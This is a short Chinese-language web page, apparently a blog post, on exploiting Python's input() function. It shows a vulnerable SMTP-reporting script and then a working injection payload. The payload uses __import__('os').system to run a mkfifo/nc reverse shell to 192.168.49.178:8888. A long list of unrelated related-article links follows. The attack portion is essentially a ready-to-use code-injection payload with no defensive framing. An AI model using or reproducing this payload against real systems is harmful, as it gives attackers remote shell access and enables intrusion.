当前位置: 首页 > news >正文

Python输入漏洞利用(Python input漏洞)

news 来源:原创 2024/4/29 5:52:53

背景条件

  1. 源码为python编写的程序
  2. 该程序包含input函数,利用用户或自动化输入获取参数进行下一步

漏洞函数

  • input():接收用户输入且不修改输入的类型
  • raw_input():接收用户输入并强制修改为字符串类型

漏洞源码示例

#!/usr/bin/python3
#-*- coding: utf-8 -*-
 
import smtplib
 
address = 'soc.protections@beerpwn.it'
data = str(input('report: '))
print('[+] sending the message: ' + str(data))
 
try:
    server = smtplib.SMTP("beerpwn.it", None, None)
    server.sendmail("local@bottleneck", address, str(data))
    server.close()
except Exception as e:
    pass

Payload

../etc/passwd' and __import__("os").system("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.49.178 8888 >/tmp/f") and '

获取反弹shell

相关文章:

  • 重启tomcat-Tomcat服务器怎么重启?
  • (附源码)spring boot校园健康监测管理系统 毕业设计 151047
  • SQL(及存储过程)跑得太慢怎么办?
  • 如何选择国际通知短信服务商?
  • RocketMQ回顾整理
  • 【大数据分析】FordFulkerson算法(JAVA实现)
  • Linux ARM平台开发系列讲解(GMSL摄像头篇)1.2 MAX9296 GMSL链路配置
  • 小波神经网络的基本原理,小波神经网络算法原理
  • 摄影测量+元宇宙!虚拟校园还有哪些值得我们期待的?
  • LeetCode_数组_中等_915.分割数组
  • Java泛型中的 “?super T“ 与 “?extends T“ 有何不同
  • MaterialDesign组件
  • 如何在不修改原始数组的情况下反转数组?
  • 以太坊学习二:签名
  • 配置本地Maven仓库——IDEA配置本地Maven源
  • 【跃迁之路】【735天】程序员高效学习方法论探索系列(实验阶段492-2019.2.25)...
  • Asm.js的简单介绍
  • AWS实战 - 利用IAM对S3做访问控制
  • CNN 在图像分割中的简史:从 R-CNN 到 Mask R-CNN
  • download使用浅析
  • JavaSE小实践1:Java爬取斗图网站的所有表情包
  • Just for fun——迅速写完快速排序
  • Netty源码解析1-Buffer
  • PaddlePaddle-GitHub的正确打开姿势
  • React系列之 Redux 架构模式
  • SpringCloud集成分布式事务LCN (一)
  • Terraform入门 - 1. 安装Terraform
  • Vue.js-Day01
  • 初识 beanstalkd
  • 欢迎参加第二届中国游戏开发者大会
  • 今年的LC3大会没了?
  • 微服务框架lagom
  • ​2020 年大前端技术趋势解读
  • ​决定德拉瓦州地区版图的关键历史事件
  • #Z0458. 树的中心2
  • #免费 苹果M系芯片Macbook电脑MacOS使用Bash脚本写入(读写)NTFS硬盘教程
  • (04)odoo视图操作
  • (13):Silverlight 2 数据与通信之WebRequest
  • (2.2w字)前端单元测试之Jest详解篇
  • (2022版)一套教程搞定k8s安装到实战 | RBAC
  • (23)Linux的软硬连接
  • (42)STM32——LCD显示屏实验笔记
  • (附源码)计算机毕业设计SSM基于java的云顶博客系统
  • (教学思路 C#之类三)方法参数类型(ref、out、parmas)
  • (转)Linux下编译安装log4cxx
  • (转)linux下的时间函数使用
  • .gitattributes 文件
  • .NET 8 编写 LiteDB vs SQLite 数据库 CRUD 接口性能测试(准备篇)
  • .net core IResultFilter 的 OnResultExecuted和OnResultExecuting的区别
  • .Net Remoting常用部署结构
  • .NET 应用启用与禁用自动生成绑定重定向 (bindingRedirect),解决不同版本 dll 的依赖问题
  • .Net 转战 Android 4.4 日常笔记(4)--按钮事件和国际化
  • .NET(C#、VB)APP开发——Smobiler平台控件介绍:Bluetooth组件
  • .NET/C# 利用 Walterlv.WeakEvents 高性能地定义和使用弱事件
  • .netcore如何运行环境安装到Linux服务器